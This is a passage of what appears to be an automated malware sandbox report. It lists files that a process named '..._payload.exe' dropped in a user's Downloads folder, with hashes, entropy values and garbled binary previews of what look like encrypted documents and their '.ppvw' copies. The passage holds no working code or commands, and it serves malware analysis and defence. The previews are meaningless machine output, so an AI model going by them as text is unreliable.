                                                                                                                          Preview:FENIV.P.}.[4........d1.U,..5....88.o.-CwKVPgj...O".7.zB.Q9...YF|U.9.u...9...L...(p7.|.......|^..$..S1.C....d.n......D{..tKV.F...,.a......R..J.. ...j..q..;..J6...E.FW.o.3./1o.N..U.A9+-B.voB.....X.v&;VR.qng8...~yi.L..J.U4}.3Kf.5D.$..PE..7....UMB.X....@O......?......n.~..B..I#...x..6.7._..h;$...G.....&2.JT.jz.,.....~..h.O@..*...-.f..2...%..OP.o.J.\'...|...$.7.......V....Z.}S.=.b....L. "A....l).D.uEv.v...%l...y.....'..`V.O..S.'Zj..\RD.K..N..xKT.ph.C..i.2(.HM...bc(6..l.K....I..S...4y_1...'..9......C9...6.s..Ro.]u>....R......&..6k..s..y.i%..0...U6.......m.%5h5......:Z.......N..'_.....'E....J...._.[....w..X..{...N.-..3.C.p.a..L._)./....B...3....;wV.>.7$..9..Wv.:.W.m..1s.m...]T.E...4.......r.X.o...H...$..(hKpu+...Z.qt/.a....]...p}*...P..@.$j..p....:.....U.FB....U.SK!.B....j.s....P.f...Z..,...AO..F.b..><i....@..Ya...V..Q7....}...s....T.{..~.J.UF}.k...b.Wb-....k......s-H.....nA.mows.....?.En.Cw .,....UBW...*...a.u.yb,)]...A. V........<...V.E

                                                                                                                          C:\Users\user\Downloads\FENIVHOIKN.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8309223854615615
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:F383efk3QoIJuSzdUVWcDdpAp/0Hw/VDzSrSTF1XJ791a4GOuDGbD:F3+efhxMdpAp8Hw9XSrgX93AVUD
                                                                                                                          MD5:AA718766E0E11F1F1AFD30683D2B652E
                                                                                                                          SHA1:B5F84199CC4621FA4918C0DF992003D41803E70A
                                                                                                                          SHA-256:851AF6DE7C3D550C785C79CE22839903266E9172A5F948ED6497FB51E6D06680
                                                                                                                          SHA-512:05882EEFE558AD6BB273D0A633CDD6BAF42E46ED28CBF33AE52670CBA89EDB3AD1964A1077F4FE2B471EA02CE75341B6861E26C3A3C7D8F1C480BE2916B3C97C
                                                                                                                          Malicious:false
                                                                                                                          Preview:FENIV.P.}.[4........d1.U,..5....88.o.-CwKVPgj...O".7.zB.Q9...YF|U.9.u...9...L...(p7.|.......|^..$..S1.C....d.n......D{..tKV.F...,.a......R..J.. ...j..q..;..J6...E.FW.o.3./1o.N..U.A9+-B.voB.....X.v&;VR.qng8...~yi.L..J.U4}.3Kf.5D.$..PE..7....UMB.X....@O......?......n.~..B..I#...x..6.7._..h;$...G.....&2.JT.jz.,.....~..h.O@..*...-.f..2...%..OP.o.J.\'...|...$.7.......V....Z.}S.=.b....L. "A....l).D.uEv.v...%l...y.....'..`V.O..S.'Zj..\RD.K..N..xKT.ph.C..i.2(.HM...bc(6..l.K....I..S...4y_1...'..9......C9...6.s..Ro.]u>....R......&..6k..s..y.i%..0...U6.......m.%5h5......:Z.......N..'_.....'E....J...._.[....w..X..{...N.-..3.C.p.a..L._)./....B...3....;wV.>.7$..9..Wv.:.W.m..1s.m...]T.E...4.......r.X.o...H...$..(hKpu+...Z.qt/.a....]...p}*...P..@.$j..p....:.....U.FB....U.SK!.B....j.s....P.f...Z..,...AO..F.b..><i....@..Ya...V..Q7....}...s....T.{..~.J.UF}.k...b.Wb-....k......s-H.....nA.mows.....?.En.Cw .,....UBW...*...a.u.yb,)]...A. V........<...V.E

                                                                                                                          C:\Users\user\Downloads\HTAGVDFUIE.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.849179948745832
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:LablynTarDrM3YLN3x47HnD9kQLwmNEMOLiXQdn+5Wul2cyQh+bD:LablynW/rMEN3S3D8MEMO2q45g5C8D
                                                                                                                          MD5:C6489D6C46A0FD5B098F888284BEC1A5
                                                                                                                          SHA1:5C9FD09B8277485E15A6C0CAFCE7C8A115FCE6CD
                                                                                                                          SHA-256:52ABEC3E695CAB51D886098926EBB5E3C1E73B6D5AB0F2F1CB70C3FFF8E9D9CC
                                                                                                                          SHA-512:C917D337B45A82FA4BAA32351E5995068D392D5A58B1015CE0FF7CC1DE38D43DD8C3BC5D7D6AF4FBDC39FA42EE5CAAA25D56FA551423A4B1FBBF7041D4B103C7
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV...Z..ZZ..]..8..*-8.#Q3.Y...?.-...Nk...7Z.......zz...*..(1.eQ....c9)N.nl.m3.......W..,....=.v.!b."W`.&T..i..1...........u.D..Z..w..;dc.1w._)...."..!Q..q.Q.S...(0...+..^:(.,.6......X.:...8.>.Q.7...<n*.{. ..P...|.....s..R..8......%.x.<.DS.R..V!.. #.......dY5'..cE..S.4v......./..>G.x%.L........n.o.?.......t{hTQ$.....ad...W...h/O....R.`..;.A..eC...3.GY.9..e...Q...r.....Y8,..9.M.)...Z...,....A.yl@o.....1..R..x.. .[+.L....gj.'....s.,^C.[.s.......|...D.q9.r...chF^vr.Y(Y.{...[..P3..6'.7v<...t.Z.[hM...i`..}-.y.W}X..=&.9)0.........K..ML.c...O`....q....~i.....&p.D....F..91.^.*.Z.....{......G.a.t.n...!.<#<.D.0...y7E.Y....]1.d..=............~.......]......z...+.hse..k..[8^.I....h.....yM .4.....4=&w3.#.....9Dt..VO..|.1...w.....J,..qu.5..4;....N..H..p.@...5....9.f@!......g.SV.D...IX...V.w.}:&.w..p..G.*~.....z7p...8.$..IL..U.....m.H.G.'<.I...k.@...[a.-.,...cn>...l8.}s.[..=.r`..k..x.m7..dT.g^I......!?w6Q.c]&.A......\.T1..i.>.Bw..V.D.Qwm.p.Tm..60...z

                                                                                                                          C:\Users\user\Downloads\HTAGVDFUIE.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.849179948745832
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:LablynTarDrM3YLN3x47HnD9kQLwmNEMOLiXQdn+5Wul2cyQh+bD:LablynW/rMEN3S3D8MEMO2q45g5C8D
                                                                                                                          MD5:C6489D6C46A0FD5B098F888284BEC1A5
                                                                                                                          SHA1:5C9FD09B8277485E15A6C0CAFCE7C8A115FCE6CD
                                                                                                                          SHA-256:52ABEC3E695CAB51D886098926EBB5E3C1E73B6D5AB0F2F1CB70C3FFF8E9D9CC
                                                                                                                          SHA-512:C917D337B45A82FA4BAA32351E5995068D392D5A58B1015CE0FF7CC1DE38D43DD8C3BC5D7D6AF4FBDC39FA42EE5CAAA25D56FA551423A4B1FBBF7041D4B103C7
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV...Z..ZZ..]..8..*-8.#Q3.Y...?.-...Nk...7Z.......zz...*..(1.eQ....c9)N.nl.m3.......W..,....=.v.!b."W`.&T..i..1...........u.D..Z..w..;dc.1w._)...."..!Q..q.Q.S...(0...+..^:(.,.6......X.:...8.>.Q.7...<n*.{. ..P...|.....s..R..8......%.x.<.DS.R..V!.. #.......dY5'..cE..S.4v......./..>G.x%.L........n.o.?.......t{hTQ$.....ad...W...h/O....R.`..;.A..eC...3.GY.9..e...Q...r.....Y8,..9.M.)...Z...,....A.yl@o.....1..R..x.. .[+.L....gj.'....s.,^C.[.s.......|...D.q9.r...chF^vr.Y(Y.{...[..P3..6'.7v<...t.Z.[hM...i`..}-.y.W}X..=&.9)0.........K..ML.c...O`....q....~i.....&p.D....F..91.^.*.Z.....{......G.a.t.n...!.<#<.D.0...y7E.Y....]1.d..=............~.......]......z...+.hse..k..[8^.I....h.....yM .4.....4=&w3.#.....9Dt..VO..|.1...w.....J,..qu.5..4;....N..H..p.@...5....9.f@!......g.SV.D...IX...V.w.}:&.w..p..G.*~.....z7p...8.$..IL..U.....m.H.G.'<.I...k.@...[a.-.,...cn>...l8.}s.[..=.r`..k..x.m7..dT.g^I......!?w6Q.c]&.A......\.T1..i.>.Bw..V.D.Qwm.p.Tm..60...z

                                                                                                                          C:\Users\user\Downloads\KATAXZVCPS.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.845059636591764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:LNUNPuUQYTqjUhn6HStuHtF79dOxbvnjRAnxLbIpATF8kpiAdPJWbD:LWPu3S3h6ytcF7P2bvnuhB1pRdPOD
                                                                                                                          MD5:D4A6E0CC516A2C099B13B79115D3D507
                                                                                                                          SHA1:3FC74A88227F818F62AB26E96EEB85D055C59BF4
                                                                                                                          SHA-256:1E5D98A99033978F0BD85644FB5ADDC0EB9E0DE425297D6DA0A190AA3EAA166B
                                                                                                                          SHA-512:185D67AF22E4BCE2D81073F3CCAD78744ED14CFFA3E95BB740D3787C6527F65EA680EF45C146BCC22A09A0A8CFEF29CF2F986147E21F73E312D34FA60DE9A9FA
                                                                                                                          Malicious:false
                                                                                                                          Preview:KATAX$...Y.......!..n.*T...u(6U.Q..4.u..c.p..U<....e..j..1xSaX.b~.d.c.[Y...YGPZ.*O4...... .f.............,....l..B.ko...K%.ezsz.y..........8h.D3..u%..Ft"....K.O.r....dx....^Qm.r..^.r.=.(..2...9..X.c..>.Px.:.....5..rzA......0.2....u.XD.......P..W..()I..9Qb.h`.......wI..{..AQ.%..F.51.4Y.T&.}..bf.(a|.jDxL.L..9U..}....e.=;..b.;..w.,..qI>.......Z.4.3....e.G..P..@..[..e.*..P.y...\...Q?pwc6uW......p....~S.....E>Wx...wn...G5..2..8r]"..Q..m<D.GO..w.;+8..y.W.."t.Q..n.:..{u+.3...5.+.v(..'.P-[.J.Z..%...+...6._._.......lK..H....&...i..8....D.Z..L..jF....7Lp+..W@.....l..m^.C...3..D}.9mK..8...V.......Q.%......;..7...{8.. ..+.j...d.2ae\3vs.&..F.I$..Z......s0C.f./.]....\...Va...Y(.=.%.....U...<...x!{....06.....A.K.Nc...#m..o0.]>l..../.W.7.9[y....fX..d{bF#x.Z...5....v.].......ys.2qQ*k..I;..^..6.J&. x.C.j.v....1d...CoDf.5ki.......v..Kv.I.....Fn...SX.#....hs.......3...V......J..u..Y.15.;l.`<....u.g_).......0.....a..!uE.....*N........L.N.E..tk.1.*Q..$>..-]"...,.;

                                                                                                                          C:\Users\user\Downloads\KATAXZVCPS.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.845059636591764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:LNUNPuUQYTqjUhn6HStuHtF79dOxbvnjRAnxLbIpATF8kpiAdPJWbD:LWPu3S3h6ytcF7P2bvnuhB1pRdPOD
                                                                                                                          MD5:D4A6E0CC516A2C099B13B79115D3D507
                                                                                                                          SHA1:3FC74A88227F818F62AB26E96EEB85D055C59BF4
                                                                                                                          SHA-256:1E5D98A99033978F0BD85644FB5ADDC0EB9E0DE425297D6DA0A190AA3EAA166B
                                                                                                                          SHA-512:185D67AF22E4BCE2D81073F3CCAD78744ED14CFFA3E95BB740D3787C6527F65EA680EF45C146BCC22A09A0A8CFEF29CF2F986147E21F73E312D34FA60DE9A9FA
                                                                                                                          Malicious:false
                                                                                                                          Preview:KATAX$...Y.......!..n.*T...u(6U.Q..4.u..c.p..U<....e..j..1xSaX.b~.d.c.[Y...YGPZ.*O4...... .f.............,....l..B.ko...K%.ezsz.y..........8h.D3..u%..Ft"....K.O.r....dx....^Qm.r..^.r.=.(..2...9..X.c..>.Px.:.....5..rzA......0.2....u.XD.......P..W..()I..9Qb.h`.......wI..{..AQ.%..F.51.4Y.T&.}..bf.(a|.jDxL.L..9U..}....e.=;..b.;..w.,..qI>.......Z.4.3....e.G..P..@..[..e.*..P.y...\...Q?pwc6uW......p....~S.....E>Wx...wn...G5..2..8r]"..Q..m<D.GO..w.;+8..y.W.."t.Q..n.:..{u+.3...5.+.v(..'.P-[.J.Z..%...+...6._._.......lK..H....&...i..8....D.Z..L..jF....7Lp+..W@.....l..m^.C...3..D}.9mK..8...V.......Q.%......;..7...{8.. ..+.j...d.2ae\3vs.&..F.I$..Z......s0C.f./.]....\...Va...Y(.=.%.....U...<...x!{....06.....A.K.Nc...#m..o0.]>l..../.W.7.9[y....fX..d{bF#x.Z...5....v.].......ys.2qQ*k..I;..^..6.J&. x.C.j.v....1d...CoDf.5ki.......v..Kv.I.....Fn...SX.#....hs.......3...V......J..u..Y.15.;l.`<....u.g_).......0.....a..!uE.....*N........L.N.E..tk.1.*Q..$>..-]"...,.;

                                                                                                                          C:\Users\user\Downloads\KZWFNRXYKI.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.878988412254692
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1hcoAVunb/jfdQF/8M+0V3ZjAa/uWFuybb0+jYKr0sjfv99/QYLbD:1hcoq87Ru//+yJjAs1BxMr8fRvD
                                                                                                                          MD5:3C476431AA781BD2CCE5C2B016DE7901
                                                                                                                          SHA1:5559A2550A310C4264CF4F955218D76EE6D904C5
                                                                                                                          SHA-256:D65A30F82B4E19E46D3C3F5B610765136D7131CFFC2FB95378D420F2F3120627
                                                                                                                          SHA-512:125E863D149E87011522BA1FD7F6B7D6350922FA3129996DD9291D57871CC19F6864964D9CA74DB804F53E3145FABD083393E10E8E454112C9C5C40754FAA164
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFN..w..}B......G].^~q.z....4..*Ns.E....##cxa.$S.....HKy.........>'$.H.U.H.....A..t...j.?.M6....F._=.HM4.Y.J..*B8........%..H.*..,'...0.H........$&Yw<d...lt{_.^....i.......>=iye...]....R.2...gk4.50..V.-(..*....>w...7.MF.....,.k.ja... .i.......7.)MHt-."..2.\T..;.'...|<.*_=s..1F.\_X.t.........1..r.p.I.iE...`K.......nk..n...T.l...>...l...?1.8..S}....;.}...... ..z2F.6/<E.o.%...K.(.yO.q61...D.....R..!./.e.H._wM5#vC....Q......HN.h....{.........C....:/L.....T..H.#..c.....2..!.dS"..../....N.....,...n4jA.......F.T....._zt4F.>...Sleu.._.%q...[F4..[../...r......Q6...&Bx.Q8">...I.....'h.......Z.y&;(QkK..)...gA...r...._3.r..............|.>.p.c..P.K.<.......qR.....V.,...e.U.}...................c.#$.Gb.5..<"O;.E.xf.>....:u~+..+...:....z.D.r....qP.i...u. r..P=...(..A..Ae.L..Lyb..V....9.g.......0.ul.....r...'..!.3"..[sd.#Ets...8I..l...2.^..!..V..@....g..@..&.........Zm...T...(.T:...k.....k......Se.'.j.!...?..m.~..r.4L/u.1...9.. h?.W|.z.....)W"k@..|M.~.9.=B.....

                                                                                                                          C:\Users\user\Downloads\KZWFNRXYKI.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.878988412254692
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1hcoAVunb/jfdQF/8M+0V3ZjAa/uWFuybb0+jYKr0sjfv99/QYLbD:1hcoq87Ru//+yJjAs1BxMr8fRvD
                                                                                                                          MD5:3C476431AA781BD2CCE5C2B016DE7901
                                                                                                                          SHA1:5559A2550A310C4264CF4F955218D76EE6D904C5
                                                                                                                          SHA-256:D65A30F82B4E19E46D3C3F5B610765136D7131CFFC2FB95378D420F2F3120627
                                                                                                                          SHA-512:125E863D149E87011522BA1FD7F6B7D6350922FA3129996DD9291D57871CC19F6864964D9CA74DB804F53E3145FABD083393E10E8E454112C9C5C40754FAA164
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFN..w..}B......G].^~q.z....4..*Ns.E....##cxa.$S.....HKy.........>'$.H.U.H.....A..t...j.?.M6....F._=.HM4.Y.J..*B8........%..H.*..,'...0.H........$&Yw<d...lt{_.^....i.......>=iye...]....R.2...gk4.50..V.-(..*....>w...7.MF.....,.k.ja... .i.......7.)MHt-."..2.\T..;.'...|<.*_=s..1F.\_X.t.........1..r.p.I.iE...`K.......nk..n...T.l...>...l...?1.8..S}....;.}...... ..z2F.6/<E.o.%...K.(.yO.q61...D.....R..!./.e.H._wM5#vC....Q......HN.h....{.........C....:/L.....T..H.#..c.....2..!.dS"..../....N.....,...n4jA.......F.T....._zt4F.>...Sleu.._.%q...[F4..[../...r......Q6...&Bx.Q8">...I.....'h.......Z.y&;(QkK..)...gA...r...._3.r..............|.>.p.c..P.K.<.......qR.....V.,...e.U.}...................c.#$.Gb.5..<"O;.E.xf.>....:u~+..+...:....z.D.r....qP.i...u. r..P=...(..A..Ae.L..Lyb..V....9.g.......0.ul.....r...'..!.3"..[sd.#Ets...8I..l...2.^..!..V..@....g..@..&.........Zm...T...(.T:...k.....k......Se.'.j.!...?..m.~..r.4L/u.1...9.. h?.W|.z.....)W"k@..|M.~.9.=B.....

                                                                                                                          C:\Users\user\Downloads\LTKMYBSEYZ.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.856805958890336
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:GCkEBcub9QGq/DRkAgH3ZpY9XonM+GKqNVU7NA9k50wZqEzUkIaVavUbD:G1EBduGq9dgXZpYJoK1VU7NApaVc+D
                                                                                                                          MD5:46533237FCFDC3DA7A14729020F9A202
                                                                                                                          SHA1:20662B8FFE43ECD631DABE239060B06BAF650B27
                                                                                                                          SHA-256:23993D14C0B2BCDAF436E90C20484D4285FCC2998A2204324A45147410693F77
                                                                                                                          SHA-512:18A66991DFD1E7E53834ECB3EA367B51ECDD1034FADA7B2795DB4A63FAE95380E1996737610CDD197D43E65DF997FD0D10F4BBE2FDECA953AF64B993A46611F8
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY..\.?O+.....v..-...FR.......E@....f....L.....j.2...t.Q....8..(..ze./.Z..].d....hm>...9...#.um.."..X...o.....$..Z7g...g..0....nz.....61...@.8.x..}E,}`.F(~!^.D........%...p..8.R.t......<YL-...\u.c..VW?_.%.8...C8.|....S..:A..)..wZA.E..(...'k..q...1}^.</.FS.C.........Sv..b..sP...kv.....u.E..!.F..DN.j..x~.Y...F.......(d....-..y.. m...,...,;.. H.#%."...9$.J..\:....1VVM..?....Q..{....e'..?....6..lj....g....T...>`.IH.?"...Emq........G M.~.~..YG.2..j{.r.C.Q..c...=Q.........q[...b.......4@b...RY...M...b.....f..o.t8...}....n&O...j...>....#D..T.I...X.........0.R.g41.o...n.3.uJ=l...X........uH...(.a;.V..K.a.K\...~...yE......f..+O...'.....".L............eQ..(1p+ho^d.=.&.m.4..^Oq`...?.yGq.+.|".......b.F..P..>. t{..B...$-C.[.#........7.*|.G.O.;F......FH....q...N....}....^....u..Y....\o/....5..w.=.....I.......in$......"31.z.....G.T..1m'Z!..;s...b.. }..$..$C.._.i.4..Y8.Mn......('V(..h.....>...w..=s.y.?...<AJ.w!.=.z...;p...i..Ce)\[..

                                                                                                                          C:\Users\user\Downloads\LTKMYBSEYZ.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.856805958890336
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:GCkEBcub9QGq/DRkAgH3ZpY9XonM+GKqNVU7NA9k50wZqEzUkIaVavUbD:G1EBduGq9dgXZpYJoK1VU7NApaVc+D
                                                                                                                          MD5:46533237FCFDC3DA7A14729020F9A202
                                                                                                                          SHA1:20662B8FFE43ECD631DABE239060B06BAF650B27
                                                                                                                          SHA-256:23993D14C0B2BCDAF436E90C20484D4285FCC2998A2204324A45147410693F77
                                                                                                                          SHA-512:18A66991DFD1E7E53834ECB3EA367B51ECDD1034FADA7B2795DB4A63FAE95380E1996737610CDD197D43E65DF997FD0D10F4BBE2FDECA953AF64B993A46611F8
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY..\.?O+.....v..-...FR.......E@....f....L.....j.2...t.Q....8..(..ze./.Z..].d....hm>...9...#.um.."..X...o.....$..Z7g...g..0....nz.....61...@.8.x..}E,}`.F(~!^.D........%...p..8.R.t......<YL-...\u.c..VW?_.%.8...C8.|....S..:A..)..wZA.E..(...'k..q...1}^.</.FS.C.........Sv..b..sP...kv.....u.E..!.F..DN.j..x~.Y...F.......(d....-..y.. m...,...,;.. H.#%."...9$.J..\:....1VVM..?....Q..{....e'..?....6..lj....g....T...>`.IH.?"...Emq........G M.~.~..YG.2..j{.r.C.Q..c...=Q.........q[...b.......4@b...RY...M...b.....f..o.t8...}....n&O...j...>....#D..T.I...X.........0.R.g41.o...n.3.uJ=l...X........uH...(.a;.V..K.a.K\...~...yE......f..+O...'.....".L............eQ..(1p+ho^d.=.&.m.4..^Oq`...?.yGq.+.|".......b.F..P..>. t{..B...$-C.[.#........7.*|.G.O.;F......FH....q...N....}....^....u..Y....\o/....5..w.=.....I.......in$......"31.z.....G.T..1m'Z!..;s...b.. }..$..$C.._.i.4..Y8.Mn......('V(..h.....>...w..=s.y.?...<AJ.w!.=.z...;p...i..Ce)\[..

                                                                                                                          C:\Users\user\Downloads\NWTVCDUMOB.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.848080632783251
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:WX40NJsVf+Qw9MBG6i5v1qCRhtfrvM8J2sDFaC5P1ALVKBiVzarlPKPPEt42Ysx8:+5NJmwqGDTfxrvM8JDld10Vy0arwHy4d
                                                                                                                          MD5:15D5A1F3B366BDBD1DCEB6B8F8447107
                                                                                                                          SHA1:02ECFD9B706171CC53A795FC7DE152684D887DFB
                                                                                                                          SHA-256:19E587BD613C040EE2E6F09999CE020907A1DEBA550073500C61879E8F8A370C
                                                                                                                          SHA-512:227BB92890ECA55F872571352F9E5CDE6EBBB8C565F9CB8C18D3CBFE6528365CF976220EB28F8445462A35D17401AFD4BAFED136A6FB9045F4A2C75C1ACB7586
                                                                                                                          Malicious:false
                                                                                                                          Preview:NWTVC.[.m.-.......kZ/.L.....X{.'RK-?..e.W.V,...<.P9'..cCf.....f)....?:.e..zA.'./\f..a....-ms.....=R.p........n.]...,..X*....++l.....^U......f...}.....>*"..Bg......"t.J.>....y.....t.*.}..d..F.AO....6.2xcI...H../..a..y-.-.....|A[.e..-Y.....V.!..T..W.7.i....@2../dp`..... ..OAf...z.{0q.wL...k..).."...\Ad.(E.....e....&..=.'Q......[.....m.....Z..4. 2..9g.tg.].H....T......C.0p.a.(.v<.....f......eX.a.ocj.....$2.......m....o......n...g..2......#.--......r.{....f.s..qq.J..O....+ ~.<(..+.M...]%..)..W.H..qy..\..k..L319.oW.h......S..?.l.a^..7..1...k`...I..*b.:..ICIy..N.V.A...;.N..;.........E.'.]..........Iv.O.b...A*..@...tE... {.Q..~A..EJ1b.......n.......8.H...x.....C$2.~`.?...-.F...!'.eV.$...F.U.l..8.....(PV.W.Cg..n......F....\...8<..N..<..T.dJ..C.C.2X..j..j.}9.....Hg.5_.e..0.T.._5.."..M.r.Y0...A..L.....H.k..VR.P.1O.W...F.....-.+Ea.Z@.p.s.........K....0.{XGL..U..r/l...i.B...P..8.......6...$.,...........b...'.B]...{3.~&.M..Y.z..O..p%.. /.2(..w.~

                                                                                                                          C:\Users\user\Downloads\NWTVCDUMOB.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.848080632783251
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:WX40NJsVf+Qw9MBG6i5v1qCRhtfrvM8J2sDFaC5P1ALVKBiVzarlPKPPEt42Ysx8:+5NJmwqGDTfxrvM8JDld10Vy0arwHy4d
                                                                                                                          MD5:15D5A1F3B366BDBD1DCEB6B8F8447107
                                                                                                                          SHA1:02ECFD9B706171CC53A795FC7DE152684D887DFB
                                                                                                                          SHA-256:19E587BD613C040EE2E6F09999CE020907A1DEBA550073500C61879E8F8A370C
                                                                                                                          SHA-512:227BB92890ECA55F872571352F9E5CDE6EBBB8C565F9CB8C18D3CBFE6528365CF976220EB28F8445462A35D17401AFD4BAFED136A6FB9045F4A2C75C1ACB7586
                                                                                                                          Malicious:false
                                                                                                                          Preview:NWTVC.[.m.-.......kZ/.L.....X{.'RK-?..e.W.V,...<.P9'..cCf.....f)....?:.e..zA.'./\f..a....-ms.....=R.p........n.]...,..X*....++l.....^U......f...}.....>*"..Bg......"t.J.>....y.....t.*.}..d..F.AO....6.2xcI...H../..a..y-.-.....|A[.e..-Y.....V.!..T..W.7.i....@2../dp`..... ..OAf...z.{0q.wL...k..).."...\Ad.(E.....e....&..=.'Q......[.....m.....Z..4. 2..9g.tg.].H....T......C.0p.a.(.v<.....f......eX.a.ocj.....$2.......m....o......n...g..2......#.--......r.{....f.s..qq.J..O....+ ~.<(..+.M...]%..)..W.H..qy..\..k..L319.oW.h......S..?.l.a^..7..1...k`...I..*b.:..ICIy..N.V.A...;.N..;.........E.'.]..........Iv.O.b...A*..@...tE... {.Q..~A..EJ1b.......n.......8.H...x.....C$2.~`.?...-.F...!'.eV.$...F.U.l..8.....(PV.W.Cg..n......F....\...8<..N..<..T.dJ..C.C.2X..j..j.}9.....Hg.5_.e..0.T.._5.."..M.r.Y0...A..L.....H.k..VR.P.1O.W...F.....-.+Ea.Z@.p.s.........K....0.{XGL..U..r/l...i.B...P..8.......6...$.,...........b...'.B]...{3.~&.M..Y.z..O..p%.. /.2(..w.~

                                                                                                                          C:\Users\user\Downloads\ONBQCLYSPU.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8420913323099475
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2VsPLxK1CETQOpC4PhBXiBRP9Q3CYrYUQyGC/+PlA/DqngMb4kl3AbD:ysPVK1CepCunX+59bYMUQe/S6rqgkTaD
                                                                                                                          MD5:B4B44CCEEA516E01473189C4632ACFDB
                                                                                                                          SHA1:FD7D772D9DD46651B6EDD65D1C444044E3D28307
                                                                                                                          SHA-256:2E57DB150B7B102552816F1DA7505FA6E11D1076CC0CC7DA8B671F339DC5DCF7
                                                                                                                          SHA-512:A76464128EA4A483F2B0E219927CB6FCEB20FDBEE8214764BBC29C76B1D906B19FD3D340C19803C7793850CA971DCA8A9CF17BFACA897B10816AABAFC691C5B9
                                                                                                                          Malicious:false
